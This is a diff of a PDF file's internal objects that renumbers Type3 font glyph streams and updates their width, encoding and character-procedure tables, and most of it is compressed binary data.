÷ÃâôU«o²CÕ0Ë–*¤ÅSTB¶‹ú`ζÑñÞ&‡í%‹ãE¶Ÿ´§QÒÈ0›b4è3¾Ýe}÷¿Íÿô"Ý_馡}Èl® endstream endobj -1443 0 obj << +1317 0 obj << /Length 204 /Filter /FlateDecode >> @@ -9450,7 +8326,7 @@ x Â@à . ´Vf. ›´1àL!he!Vji¡(X›£å({„”Á8룗åø‡ùÝéÅQ—Úš’˜º}Úi<"ÏÈŃ÷f{ÀQ†jÅ{T3ŽQes:Ÿ.{T£Å˜4ª ­5EÌ&¡€º6äü¥…°%/_x÷/PAP02gøýÁ0Ò¦–yp&îî¬dBw›:Œ+0ðÁüâ}¨AT¾yóMÞ6Ó¢5lö–¢.Ë5²Ài†K|¤øT£ endstream endobj -1444 0 obj << +1318 0 obj << /Length 198 /Filter /FlateDecode >> @@ -9458,7 +8334,7 @@ stream xÚ31Ó34V0P0RÐ5T01V0µPH1ä*ä21PASKˆLr.—“'—~¸‚‰—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEùÃT‚D0S$ê00|`ÇÀü¹A¾ù;ÿæ ì˜ÿå˜00þ* àÄ?8Q"êI&êPMÊøbÛ½`Ëßœq ä ã ò Ìê˜þÿ:]þ—«'W ÈckA endstream endobj -1445 0 obj << +1319 0 obj << /Length 182 /Filter /FlateDecode >> @@ -9469,7 +8345,7 @@ xÚ w§”§ÍSZÓ»= endstream endobj -1446 0 obj << +1320 0 obj << /Length 198 /Filter /FlateDecode >> @@ -9477,7 +8353,7 @@ stream xÚ31Ó34V0P0VÐ5T01Q0µPH1ä*ä21PASKˆLr.—“'—~¸‚‰—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEÿó‚ÁþT‚zó !ÿHÔ±÷`øÁøþó†ú쀶¤ „|P±=˜i«‡u âÉDª)öph‘<„ÚkrF=ÈAï?0þ`<ÿŸ¡†½ÿ?ƒü?þÿ ì@‡s¹zrroXhI endstream endobj -1447 0 obj << +1321 0 obj << /Length 189 /Filter /FlateDecode >> @@ -9487,7 +8363,7 @@ x qáÁ23ü;èö9änÀ¶ÏvÈû€ÎdC)úlGUgw¤IBfÍ6$3—2™dÁ×Ëí@f²œr@&æm)‰Ú¸·2Ï©\^¡sϵ2¸Î÷¯HÅøQ‰RñþQÖOþø—Ö5ÉQÑJrµìhè M£íÂá„TårL¼@³„Vô½£@ endstream endobj -1448 0 obj << +1322 0 obj << /Length 141 /Filter /FlateDecode >> @@ -9495,7 +8371,7 @@ stream xÚ32Õ36W0P0bcSK…C®B.# ÌI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢*c¹<]ê˜ÿ70ð|À ßþ€ÁžÿCÿ`ÆÌ00ŠÿÿÿÇäè§3ÿa`¨ÿÿŽ¹\=¹¹¢&[ endstream endobj -1449 0 obj << +1323 0 obj << /Length 237 /Filter /FlateDecode >> @@ -9503,7 +8379,7 @@ stream xÚ¿J1Æ¿00…ñ v^@³9ïäŠÃ…ó·´²+µT´[¸}´> @@ -9513,7 +8389,7 @@ x Ì€à?É&™iN‚ìaþ`ÿD~°’È700nà?ÀÀüDþ“ØÀÈä‡$Ù€‚ëÿÿƒÿÿ7 “\®ž\\y endstream endobj -1451 0 obj << +1325 0 obj << /Length 122 /Filter /FlateDecode >> @@ -9521,7 +8397,7 @@ stream xÚ32Ö30W0P0aCS3…C®B.C ßÄI$çr9yré‡+Zpé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜ø0È@A@ 8~Àüá? ±q©ŽØ0üÿ‚¸\=¹¹(CE` endstream endobj -1452 0 obj << +1326 0 obj << /Length 150 /Filter /FlateDecode >> @@ -9532,7 +8408,7 @@ x @Q…h ®X.OÆ ìø   P?`üÁð†Ø€¸ôE6Œ?êügüðŸ‚üc?PÃ~À†Ÿÿó.WO®@.ÿ§Wõ endstream endobj -1453 0 obj << +1327 0 obj << /Length 196 /Filter /FlateDecode >> @@ -9541,7 +8417,7 @@ xÚµ Â@Еir3'p.#˜BÐÊB¬ÔRPQ°ÍÑr±0EÈ:? êdÙ³3ó7èuÂ.{Œô¸òʧãH‰ÆrCqJzÆGz$¯¤Ó1öÇ5éx2`ŸtÂsŸ½¥ […RÊüâë?´LõºæÝ3Ø‚ærÁÊkm‚¨„;xÔÂ3êH†Kv¤Ø@%¯â.êýoÔ nn—**ŒÉù@Ô¦ôDr endstream endobj -1454 0 obj << +1328 0 obj << /Length 108 /Filter /FlateDecode >> @@ -9549,7 +8425,7 @@ stream xÚ32Ö30W0P0aCS …C®B.C ßÄI$çr9yré‡+Zpé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜?0ü‡!þ ̃±ÿ`øÿÿq¹zrrÆ‚Q. endstream endobj -1455 0 obj << +1329 0 obj << /Length 177 /Filter /FlateDecode >> @@ -9557,7 +8433,7 @@ stream xÚ3³Ô3R0Pa3scs…C®B.3 ßÄI$çr9yré‡+˜™pé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜?ð`Àðÿƒý†ú@úƒ=ãƒ:†ÿÈ77Ø3ðnà?Î ßÀüÿˆþÇÀDÿa`ÿÁÀNÿ``ÿ€þÀÀþ`Ð O€âÿÿƒÿÿ7ÿÿNs¹zrr#߈ endstream endobj -1456 0 obj << +1330 0 obj << /Length 147 /Filter /FlateDecode >> @@ -9567,7 +8443,7 @@ x Ìø?00üÿ`ÿD~°’È70ðnà?ÀÀüDþ“ØÀÈä‡$Ù0½ñÿÿÁÿÿI.WO®@.‡e% endstream endobj -1457 0 obj << +1331 0 obj << /Length 188 /Filter /FlateDecode >> @@ -9577,7 +8453,7 @@ xÚ éáwlzZÚÑIKÚ endstream endobj -1458 0 obj << +1332 0 obj << /Length 196 /Filter /FlateDecode >> @@ -9586,7 +8462,7 @@ xÚα Â@ àH†B¡y½ž­uj;:9ˆ“::(ºÚ>Z¥p"ØŠç]qÐQ |CB’?Šû2ä€Ü“1G!‡#ÞI:R°«aøm”d$V$f¶O"›óùtÙ“H–$R^K6”¥ŒÊ¯À¨\ƒ¹UW0÷Â/¼º%>Á«°T¨5*è´4hy~“ÿÌ÷ö²¥ý¦Ýß> @@ -9595,7 +8471,7 @@ x äFºf# endstream endobj -1460 0 obj << +1334 0 obj << /Length 140 /Filter /FlateDecode >> @@ -9603,7 +8479,7 @@ stream xÚ36Ò35R0PacCcs…C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ØÈ3üPàÿÃÇþ?nÿÀÿœýó3 ~Äo˜0ÿah`þÁÀ€‚?P³Íüÿÿs¹zrrjÙF„ endstream endobj -1461 0 obj << +1335 0 obj << /Length 195 /Filter /FlateDecode >> @@ -9613,7 +8489,7 @@ x Wî£í£ÄÊ6`“"8Î%GŠ™ùÿfŠ|q~ÆK.ø4p¡ó‚½R^j¨çåÔ<> @@ -9627,7 +8503,7 @@ x  Ø W á Œ@Ì Äì@,ÿÿ?Ã(f„ÊQ „þ0‚pC sC3ƒ=;ÿ?°f.WO®@.uH– endstream endobj -1463 0 obj << +1337 0 obj << /Length 153 /Filter /FlateDecode >> @@ -9638,7 +8514,7 @@ x @Q…h žX.Oæ ìþ`üJò`À‘p’ƒºBþ`°ÀÀðƒ¡üÆçÿì™Iùÿí@’ùÐ.WO®@.1c endstream endobj -1464 0 obj << +1338 0 obj << /Length 183 /Filter /FlateDecode >> @@ -9648,7 +8524,7 @@ x œÒ.Á.X ,g0i)à <¡¥©¡pƒ¶&†®A†=éjœ|c(v‘kØ]þb=ÀÐ(Ô¿áúO¨ÁI† |F£?ê endstream endobj -1465 0 obj << +1339 0 obj << /Length 233 /Filter /FlateDecode >> @@ -9657,7 +8533,7 @@ x ÖQ|A7©‘|±€Ð~Lïx‡`¼7UÓN?8gù«áá°Ï!ñAÄjÀÝÏ"z$¥ìr·¿~nîh”¼d¥HžÚ™drÆÏO/·$GçcŽHNø*âðš’ WUPñ÷6¾Aß´4æðŠ5¹§q ‘þ" bxØ%âtÇq¿Á_ù®cùGˆÅ²h;²š÷L€ Ëtè5Â<þfúOk…2·|âµÁ+ñ–ZlECÝdÑ ±ï(°ç˜ÂÑIBô¥Y_™ endstream endobj -1466 0 obj << +1340 0 obj << /Length 210 /Filter /FlateDecode >> @@ -9667,7 +8543,7 @@ x Õºëû–ëû-Ö,µ¯Ø’ÿ^9â\ŽÈu7ép38oÝÖº|U%4£Ã#N¤ endstream endobj -1467 0 obj << +1341 0 obj << /Length 219 /Filter /FlateDecode >> @@ -9676,7 +8552,7 @@ x Î èn²Zõ$¨sÚSE¨GÁ½‰æÑöQ|„x ‰³²Iéå;üÃüü=ÝF¤(¢N8 ^DúÖ!þ qª¨¯ÝiµÅIŒò‹ôåœs”ñ‚ö¿‡ ÊÉÇ”B”3úI-1žQY¦ãâàAægà//7ˆœŽ4gËZŽvª*Ì 0‰Ã¿˜Š+ã]S‡¸CEÉ@QsüÏ°FÕì,IqSn/¼'¶’gCþbŸ^m‘mjg`ç1øã'>ÚŸKø endstream endobj -1468 0 obj << +1342 0 obj << /Length 183 /Filter /FlateDecode >> @@ -9685,7 +8561,7 @@ x Â@„á‘@„‡$|'0‰+AA¢‚)­,D¨¥ ¢æQ<‚eŠ`œÅ_ìì·°&î# µÇL_M¬‡H.bìÚ£½ØŸ$I%ب‰$Xp• ]êíz?J¬¦Êu¦[>ÙI:ÓIU•uO§Ã)Fh~ðß!;£ó:còÌÛዬQÖ‘‚ôŸÿ)HÿåpIëH]R·YÀ#õH[¤mé(œ²âl2Oe-?uàC endstream endobj -1469 0 obj << +1343 0 obj << /Length 188 /Filter /FlateDecode >> @@ -9695,7 +8571,7 @@ xÚµ A+ ±RK EÁBbŽ¶GÉR¦R×l´6¯˜˜ÿþPtÌ+îǬƬ5$Ii;ŒXÜf¢$#±a¥I,ì˜D¶äëåv$‘¬f,I¤¼•í(K~ |[äj¿„W¢‚opGÏà ÀÄ!´—S‹¢E¦ /‹òèzù´ÌO¾6x+Ó¸YÛ~åÕÎÜuдñí…æ­éÂÕ`ú endstream endobj -1470 0 obj << +1344 0 obj << /Length 121 /Filter /FlateDecode >> @@ -9703,7 +8579,7 @@ stream xÚ31Ô35R0P0bc3SS…C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]0001;Ëñÿ ÿaX*6T°ý†úÿÿ?À0—«'W ¾NÚ endstream endobj -1471 0 obj << +1345 0 obj << /Length 228 /Filter /FlateDecode >> @@ -9712,7 +8588,7 @@ x %‡s„'äƒlÏ"³ÈÌñ¥™aAZÒ›M°¿ÈY'Wò TŸc| endstream endobj -1472 0 obj << +1346 0 obj << /Length 235 /Filter /FlateDecode >> @@ -9720,7 +8596,7 @@ stream xÚuÐ1NÄ0ЉRXšß`3', ZiY$R AE¨€ ´ØGóQr„”[¬0¼„‰"OÊŒóÇ“ãîÈ/¥•^—ÒŸ‰÷òØñ+÷ÅVüɾóðÌëÝ­ôžÝ%Êì†+yûxb·¾>—ŽÝFî:iïyØ™-­2È9QµµÕ EëPõE6‚f¤LÍôV»&‘ÆàðÌÔb&e6‚€§Ñf“õÕŽó‘òY (yâ/ifU ý°Å_ cBüÔ¨M>Õ‹ý‚¸Ÿ™°y¥ÿ€‚Žµ¸2_ |ÃßÇ›jh endstream endobj -1473 0 obj << +1347 0 obj << /Length 188 /Filter /FlateDecode >> @@ -9730,7 +8606,7 @@ xڕν ØÀ©iƒèA«äf°1ë€h‚.p;»Áö`¯Z  \2ðoóŠß›ÿÂy™³54Ö4§òý`ö endstream endobj -1474 0 obj << +1348 0 obj << /Length 226 /Filter /FlateDecode >> @@ -9739,7 +8615,7 @@ xÚ•Ï¿jA ìnÍG¹G°´8ÜÌœEH:›_1;ödÏyŸSp¯ÏnÈyΟíÉ9)¦œ¿Ü_6[šd?Ø9²oR&[Ìùð}ü";YL9#;ãeÆ銊ÇÀŒÇæҺ„ÐpQ*Å+j .+xsº7á”xÄ•‘Íç–Üð‘\ƒ }µrÓþ† ”¿ø´•R þ/:tK­¬uéîNTc¨'Û¼‰Ä'ò¡jìiT”2ƒ®D¥×‚Þé+XÑ endstream endobj -1475 0 obj << +1349 0 obj << /Length 243 /Filter /FlateDecode >> @@ -9747,7 +8623,7 @@ stream xÚm½JÄ@…OØ"p›¼ÁÎ}d³ƒÚXW0… •… j)¨hëäÑò(ó)S„ÏD…m>†{çüÜuuìVZj­G+­ÏÔ9}ªäMjÇa©îägóø"›VìÖNìÇbÛkýxÿ|»¹¹ÐJìVï+-¤Ý*Ðô@ P„sŽºø‚&¾³¾[ D>#E@ƒ¢Ç†r˜Iõ~2û> @@ -9758,7 +8634,7 @@ xڕα d“_Ñ®Ó+ÈJ¢_<ÿ!’¯tùâ<Á5~lúQ- endstream endobj -1477 0 obj << +1351 0 obj << /Length 265 /Filter /FlateDecode >> @@ -9767,7 +8643,7 @@ x À`;d1ëa¶°3X`LpÀM6{ä{xÖSÏœ˜°Hpžî|tO¥0£1l¹6Ì ùi4ÈþÓ,ìÀe3zŸÓáw™gRÒô¦SÅß@v伕+ùÿcå endstream endobj -1478 0 obj << +1352 0 obj << /Length 237 /Filter /FlateDecode >> @@ -9776,106 +8652,108 @@ x ¶¤AKr®â›ì!eŠ3³ ˆšgiÿ_×'aE5t¼¢æŒB ÇŸ± 2¬(œÎ_žpÓ¢¿¥& ¿”1úöŠ^_Þvè7×çT£ßÒ]MÕ=¶[‚b—….'0SÉ2*(ÙŒ`&p ÞÁõBì!Ît ç¼àÒð_èÝ_èR¥c§Ø™%Éž 6{6Cñ!I¬cˆ“Ä)A×ô?€Ö«ÌÁ“ôXZ1IÁØËN+éOVë”ùÀäqY‰-Þàú m9 endstream endobj -416 0 obj << +499 0 obj << /Type /Font /Subtype /Type3 /Name /F15 /FontMatrix [0.01204 0 0 0.01204 0 0] /FontBBox [ -4 -21 83 62 ] /Resources << /ProcSet [ /PDF /ImageB ] >> -/FirstChar 21 +/FirstChar 27 /LastChar 122 -/Widths 1479 0 R -/Encoding 1480 0 R -/CharProcs 1481 0 R +/Widths 1353 0 R +/Encoding 1354 0 R +/CharProcs 1355 0 R >> endobj -1479 0 obj -[41.52 0 0 0 0 0 48.44 46.13 46.13 69.2 0 0 23.07 41.52 0 0 0 0 23.07 32.29 32.29 0 0 23.07 27.68 23.07 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 23.07 23.07 0 0 0 0 0 62.28 58.82 59.97 63.43 56.51 54.2 65.16 62.28 29.99 42.67 64.58 51.9 76.12 62.28 64.58 56.51 64.58 61.12 46.13 59.97 62.28 62.28 85.34 62.28 62.28 0 0 0 0 0 0 0 41.52 46.13 36.91 46.13 36.91 25.37 41.52 46.13 23.07 25.37 43.82 23.07 69.2 46.13 41.52 46.13 43.82 32.52 32.75 32.29 46.13 43.82 59.97 43.82 43.82 36.91 ] +1353 0 obj +[48.44 46.13 46.13 69.2 0 0 23.07 41.52 0 0 0 64.58 23.07 32.29 32.29 0 0 23.07 27.68 23.07 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 23.07 23.07 0 64.58 0 0 0 62.28 58.82 59.97 63.43 56.51 54.2 65.16 62.28 29.99 42.67 64.58 51.9 76.12 62.28 64.58 56.51 64.58 61.12 46.13 59.97 62.28 62.28 85.34 62.28 62.28 0 0 0 0 0 64.58 0 41.52 46.13 36.91 46.13 36.91 25.37 41.52 46.13 23.07 25.37 43.82 23.07 69.2 46.13 41.52 46.13 43.82 32.52 32.75 32.29 46.13 43.82 59.97 43.82 43.82 36.91 ] endobj -1480 0 obj << +1354 0 obj << /Type /Encoding -/Differences [21/a21 22/.notdef 27/a27/a28/a29/a30 31/.notdef 33/a33/a34 35/.notdef 39/a39/a40/a41 42/.notdef 44/a44/a45/a46/a47/a48/a49/a50/a51/a52/a53/a54/a55/a56/a57/a58/a59 60/.notdef 65/a65/a66/a67/a68/a69/a70/a71/a72/a73/a74/a75/a76/a77/a78/a79/a80/a81/a82/a83/a84/a85/a86/a87/a88/a89 90/.notdef 97/a97/a98/a99/a100/a101/a102/a103/a104/a105/a106/a107/a108/a109/a110/a111/a112/a113/a114/a115/a116/a117/a118/a119/a120/a121/a122] +/Differences [27/a27/a28/a29/a30 31/.notdef 33/a33/a34 35/.notdef 38/a38/a39/a40/a41 42/.notdef 44/a44/a45/a46/a47/a48/a49/a50/a51/a52/a53/a54/a55/a56/a57/a58/a59 60/.notdef 61/a61 62/.notdef 65/a65/a66/a67/a68/a69/a70/a71/a72/a73/a74/a75/a76/a77/a78/a79/a80/a81/a82/a83/a84/a85/a86/a87/a88/a89 90/.notdef 95/a95 96/.notdef 97/a97/a98/a99/a100/a101/a102/a103/a104/a105/a106/a107/a108/a109/a110/a111/a112/a113/a114/a115/a116/a117/a118/a119/a120/a121/a122] >> endobj -1481 0 obj << -/a21 1412 0 R -/a27 1415 0 R -/a28 1414 0 R -/a29 1416 0 R -/a30 1417 0 R -/a33 1404 0 R -/a34 1413 0 R -/a39 1405 0 R -/a40 1402 0 R -/a41 1403 0 R -/a44 1406 0 R -/a45 1411 0 R -/a46 1407 0 R -/a47 1408 0 R -/a48 1469 0 R -/a49 1470 0 R -/a50 1471 0 R -/a51 1472 0 R -/a52 1473 0 R -/a53 1474 0 R -/a54 1475 0 R -/a55 1476 0 R -/a56 1477 0 R -/a57 1478 0 R -/a58 1409 0 R -/a59 1410 0 R -/a65 1418 0 R -/a66 1419 0 R -/a67 1420 0 R -/a68 1421 0 R -/a69 1422 0 R -/a70 1423 0 R -/a71 1424 0 R -/a72 1425 0 R -/a73 1426 0 R -/a74 1427 0 R -/a75 1428 0 R -/a76 1429 0 R -/a77 1430 0 R -/a78 1431 0 R -/a79 1432 0 R -/a80 1433 0 R -/a81 1434 0 R -/a82 1435 0 R -/a83 1436 0 R -/a84 1437 0 R -/a85 1438 0 R -/a86 1439 0 R -/a87 1440 0 R -/a88 1441 0 R -/a89 1442 0 R -/a97 1443 0 R -/a98 1444 0 R -/a99 1445 0 R -/a100 1446 0 R -/a101 1447 0 R -/a102 1448 0 R -/a103 1449 0 R -/a104 1450 0 R -/a105 1451 0 R -/a106 1452 0 R -/a107 1453 0 R -/a108 1454 0 R -/a109 1455 0 R -/a110 1456 0 R -/a111 1457 0 R -/a112 1458 0 R -/a113 1459 0 R -/a114 1460 0 R -/a115 1461 0 R -/a116 1462 0 R -/a117 1463 0 R -/a118 1464 0 R -/a119 1465 0 R -/a120 1466 0 R -/a121 1467 0 R -/a122 1468 0 R +1355 0 obj << +/a27 1288 0 R +/a28 1287 0 R +/a29 1289 0 R +/a30 1290 0 R +/a33 1277 0 R +/a34 1286 0 R +/a38 1291 0 R +/a39 1278 0 R +/a40 1274 0 R +/a41 1275 0 R +/a44 1279 0 R +/a45 1285 0 R +/a46 1280 0 R +/a47 1281 0 R +/a48 1343 0 R +/a49 1344 0 R +/a50 1345 0 R +/a51 1346 0 R +/a52 1347 0 R +/a53 1348 0 R +/a54 1349 0 R +/a55 1350 0 R +/a56 1351 0 R +/a57 1352 0 R +/a58 1282 0 R +/a59 1283 0 R +/a61 1284 0 R +/a65 1292 0 R +/a66 1293 0 R +/a67 1294 0 R +/a68 1295 0 R +/a69 1296 0 R +/a70 1297 0 R +/a71 1298 0 R +/a72 1299 0 R +/a73 1300 0 R +/a74 1301 0 R +/a75 1302 0 R +/a76 1303 0 R +/a77 1304 0 R +/a78 1305 0 R +/a79 1306 0 R +/a80 1307 0 R +/a81 1308 0 R +/a82 1309 0 R +/a83 1310 0 R +/a84 1311 0 R +/a85 1312 0 R +/a86 1313 0 R +/a87 1314 0 R +/a88 1315 0 R +/a89 1316 0 R +/a95 1276 0 R +/a97 1317 0 R +/a98 1318 0 R +/a99 1319 0 R +/a100 1320 0 R +/a101 1321 0 R +/a102 1322 0 R +/a103 1323 0 R +/a104 1324 0 R +/a105 1325 0 R +/a106 1326 0 R +/a107 1327 0 R +/a108 1328 0 R +/a109 1329 0 R +/a110 1330 0 R +/a111 1331 0 R +/a112 1332 0 R +/a113 1333 0 R +/a114 1334 0 R +/a115 1335 0 R +/a116 1336 0 R +/a117 1337 0 R +/a118 1338 0 R +/a119 1339 0 R +/a120 1340 0 R +/a121 1341 0 R +/a122 1342 0 R >> endobj -1482 0 obj << +1356 0 obj << /Length 120 /Filter /FlateDecode >> @@ -9886,7 +8764,7 @@ x @Q…h ¦X.O…ú˜ù@aƒ<2È3Ø¡Ö1Ô€á.WO®@.z½,8 endstream endobj -1483 0 obj << +1357 0 obj << /Length 288 /Filter /FlateDecode >> @@ -9895,7 +8773,7 @@ xڵѽJ ¹ÂÏgä;¥Õ)‹œšW$_­$¢4f¬ds5˜½ù¡Üå° endstream endobj -1484 0 obj << +1358 0 obj << /Length 307 /Filter /FlateDecode >> @@ -9906,7 +8784,7 @@ xÚ• ±ÿ„¨¤ÂѲ«^jlgˆª˜¢©è;9„„MhÇ»àÝ@ôlâÙ&±k«Ñk xÑá ~ZµÕÄ endstream endobj -1485 0 obj << +1359 0 obj << /Length 95 /Filter /FlateDecode >> @@ -9922,7 +8800,7 @@ x ÿŒDÈåêÉÈõéS endstream endobj -1486 0 obj << +1360 0 obj << /Length 257 /Filter /FlateDecode >> @@ -9931,7 +8809,7 @@ x ÆØGÆ¨í ²4€klñü@´ŸHIwÙm,Ï‚ÎÈeôŠ(€nD¿÷˜Ã'„_û™þ†Dô;ìð/ГF/ô <“ endstream endobj -1487 0 obj << +1361 0 obj << /Length 187 /Filter /FlateDecode >> @@ -9942,7 +8820,7 @@ Q RœÙ!/®™”‘¥¦¾ðü*’x½éx¦“ü…žñAö…ß_¢ƒX'út ÿä endstream endobj -1488 0 obj << +1362 0 obj << /Length 294 /Filter /FlateDecode >> @@ -9950,7 +8828,7 @@ stream xÚå’1N„P†‡lA2 G`. Üݬ[½d])L´²ØX¹–­áh K G ¤ ;μ¨Ä-­–>Âdþ7üÿœž')%”Îèh:¥ÅLïmŠ8_Êg)$‹¾x÷€« Í Í—h.´‚&»¤ç§—{4««3JѬi#r·˜­ ¢V\s¡ ™+eÌ\+sæVÉÌ;á›…ïÊøc'ÒüYCìDJE@khpªy£¯¶õŒ…µN r&„'¬ó|3X8˜yÏò7í>Vžñ?ÓŽ¹gžñÜùßÿŒüP~ú¦¬}¢ƒ¿ÎïÞŸ‡Ë…µÝç¹ü*°.Ï6òíóÖü_…M·n/¬F-Œº½™p·G¶òtסÏ3¼Æ/v¨R: endstream endobj -1489 0 obj << +1363 0 obj << /Length 289 /Filter /FlateDecode >> @@ -9958,7 +8836,7 @@ stream xÚåÒ¿NÃ0pG"ÝÒGȽ8¡”¦S¥R$2 ÁÄ€˜€‘³óhy?BÆQŽÏ¢”±11ý$'gŸïsuvZ”\pÅ'Ë%_T¼>çç’ÞhµÁjÁe±Žßž^iW“¾çÕ†ôµû@º¾á÷ÏÒ»ÛK.Iïù›=R½g¥”´ÊX¥29xs¼F¤‰ˆ´0…Ìà.`sé²n¥Iš¥»aÍ&Ò¹-a«PcSiÜQ'§b³!¸èar$Êњͻïn­ÓL¶A3·ùY™«þØæ÷~æ}÷™ß3ÜßLóˆóñs:šÛ8Ï,Îwšw˜?~‰yt>%(ô¹‰JCŽ6¹N9¹ÛøÆwßIßõºdïú?KW5ÝÑbÄ0Î endstream endobj -1490 0 obj << +1364 0 obj << /Length 174 /Filter /FlateDecode >> @@ -9967,7 +8845,7 @@ x Â@àI%Ì%2'p³ù!X 1‚[ZYˆ•ZZ(ZG±°ôÅÅ#¤Lg„‚'°ùàÍc^wÃdc! )ieq‹Q*9Ðøn–ÌšE)š‘œÑ¸1íw‡5šl2 ‹&§¹¥`.'ðj>‚¯‚ÇBGñ•¾R(ü>q|æøÂ|m„[­T½l‘-A¶å©¥Qêoª” Nñ]0ªù endstream endobj -1491 0 obj << +1365 0 obj << /Length 290 /Filter /FlateDecode >> @@ -9975,7 +8853,7 @@ stream xÚ•‘½NÃ@ Ç]e¨äåáüD%-L•J‘È€bF$@°!Ý=Z%1Âø# 0ÖÃýtöÙ翽®«3ªè„ŽjjNiÓÐc¯Ø¬ÄYÑf푇gܵXÞR³ÂòRÜX¶Wôþöñ„åîúœj,÷tWSuížw Æü-ç’Y¯Q0$6/«å…¡+K`Ë]`€‚sÐÜ”£ä@ÌqÐJy«Xäm¯åaBêE?‡ÕŒŽ/CdÃ$$°EImŽõ‘6ß›J»ª0ÍwµÁƒ…‹þ}|"úvVOEÏ>+Øûš†]:â8G8qª2¼xÍOGò©Ø”¸× î´ÕÀ™e9I¡fbEŠîT„é†%lKí}ÓùoL. /Z¼ÁZÎD endstream endobj -1492 0 obj << +1366 0 obj << /Length 186 /Filter /FlateDecode >> @@ -9985,7 +8863,7 @@ x A+ ±RK Eëx¯âMô–SHÖ_A°¶rŠù`^L»ÙˆÄâR©;iµ%OdéxÃY‚j,yúj-ÖÜ-ØN%KØQg[Œd·Ý¯ØvÇ=qlû2é9}ñ'"2úçWt¾Q~àß\ˆjO¯%Á•(ŠmPað¬ý Œä›Ñ¨Ñ\Œà`´æ}…_¨ô×ö‰xPð„ïbàùY endstream endobj -415 0 obj << +498 0 obj << /Type /Font /Subtype /Type3 /Name /F17 @@ -9994,48 +8872,75 @@ endobj /Resources << /ProcSet [ /PDF /ImageB ] >> /FirstChar 39 /LastChar 117 -/Widths 1493 0 R -/Encoding 1494 0 R -/CharProcs 1495 0 R +/Widths 1367 0 R +/Encoding 1368 0 R +/CharProcs 1369 0 R >> endobj -1493 0 obj +1367 0 obj [44.27 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 76.42 0 0 0 70.83 0 0 0 0 0 0 37.74 126.28 82.01 0 82.01 82.01 54.29 61.09 0 82.01 ] endobj -1494 0 obj << +1368 0 obj << /Type /Encoding /Differences [39/a39 40/.notdef 97/a97 98/.notdef 101/a101 102/.notdef 108/a108/a109/a110 111/.notdef 112/a112/a113/a114/a115 116/.notdef 117/a117] >> endobj -1495 0 obj << -/a39 1482 0 R -/a97 1483 0 R -/a101 1484 0 R -/a108 1485 0 R -/a109 1486 0 R -/a110 1487 0 R -/a112 1488 0 R -/a113 1489 0 R -/a114 1490 0 R -/a115 1491 0 R -/a117 1492 0 R +1369 0 obj << +/a39 1356 0 R +/a97 1357 0 R +/a101 1358 0 R +/a108 1359 0 R +/a109 1360 0 R +/a110 1361 0 R +/a112 1362 0 R +/a113 1363 0 R +/a114 1364 0 R +/a115 1365 0 R +/a117 1366 0 R >> endobj -1496 0 obj << -/Length1 771 -/Length2 1151 +1370 0 obj << +/Length1 1438 +/Length2 6052 /Length3 0 -/Length 1689 +/Length 7022 /Filter /FlateDecode >> stream -xÚ­RkTבª¡¬òRIÕzX%róÔ - ˆ±h €<$f&dJ2C‡ $ âƒJª²,b£Kž¢¢TXU꥖X…[ÀiáËëEªVEÀ×°®®KÿÞ5η÷>ß·gŸæ%gˆ l,ÁP‚Áar„ T&“rØ€<³Ù-‡•‚¡aJŽ@àVëµ€»°ùBÞ -!O¡P,݈#©ø„Ò'E| ÒÁ8¢R¢@¦$4°Žì¡RjS!0ad‘V ÖOÞÈëá Ï„!&…â"À&8A)¬IORTþ;Ò§¿§2a<ƒ4|¦lÒiÂP­@°šÂZ‹‘Ó`ÒËÿÃÖôæ½V»V©›l?•Ôßx¥ÑÿT`ºt=ã@†A0ŽN—ÆÂïÌÉ`Ñ릳RB©ET"4U g%“½òŽdH E!„JÔJm<…Ã(4Ý ™ß”–<^¢ðýói§È(%‚ÑÆt°ÿROÕœ¿j2$1€6“ÍæBò{Jš6LŒª0AS—ç”8®4RÈ%"+0q‚B°ÀÒ1‹‰byÉä5†S&ßÕ X©“«F†Eï06`iጌ)àï¿‚LŒ\ÀàòÈQì•þ€ÏcçüP¥Çq%¦Ö‡ è}­FÈLaØ«(¶[˜*`ÛçûÏì¨ÉWuw¤g,´ÝÖ~aûiKs¸7ÀíÞøK4üÉ®Û]?GN¸”ŒD~Ç‚Ô¼>êQ¶Õ$gmïqµ:{Ð+Èg=R '&ϸRÖÖú‘îÐÎû¶Åƒé¾~õ~~/ó‚cÝš~%u¤pfÍí[¯Ÿæ¦mîè³9} y•P’ÊήÙ+þ}¯èÚÄÃp¬ -³U_™Ÿxà¹ûµõnwÚg‹À\&s¸i |5‡M7¨û;(œƒi‹mq¥‚Õráì…~7å`÷q —%.¨¹)Röûì.º`ÀËòa·4?§$"V3ºàx…›ªf60¼šj×·nhÑ¡— -ë×廥Õwr‹9éûhëSÆ_ÓþX²k泤—/{_¼5S[©L^vž'gÄúú Îôñ¦·³©Ž×¿²zÅ+5ßÜ'DÁ½N«Ìmº÷g7É@œàfžÇ­c_yÛ¸”ÂqÝþòÈ6ø~ßdÝ›(6Ø â/£ŸöW>þÏåóAn²$4¡7å\ômß+µ «ÂÜk f&Y›$’ª%M³±žù^Aî 溈£f·íR·¡è¡æ|¶ob|Ñ ¡ß¡îWC¿”ÄXGŽú-ÊuÚº m7óaôr“ÿï"kSŒþµ§¬?Ï[¶ŠÎf¬ÛŸv¢&²f‡ÎøD0gßqAýcŽCyöùg¢¦ŸÔex¨ó‰Üü|9½¶ñjíÂ¥(êee ->×ÒŠâèàÉqS&÷Ügy‰©oºƒŽ®?\mÚ³ùÑ“Û+íÜH:õ÷ ¨éâ/Krßní 